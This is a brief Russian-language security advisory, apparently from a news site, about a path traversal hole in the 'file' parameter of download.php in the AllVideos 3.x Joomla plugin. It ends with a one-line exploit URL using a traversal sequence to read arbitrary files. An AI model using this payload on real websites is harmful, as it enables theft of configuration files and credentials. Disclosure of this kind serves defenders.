Программа: AllVideos 3.x (plugin for Joomla)

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в параметре "file" сценарием plugins/content/jw_allvideos/includes/download.php.
Атакующий может получить несанкционированный доступ к конфиденциальной
информации в произвольных файлах на целевой системе.

Эксплоит:

http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../…/file.php

Оставить мнение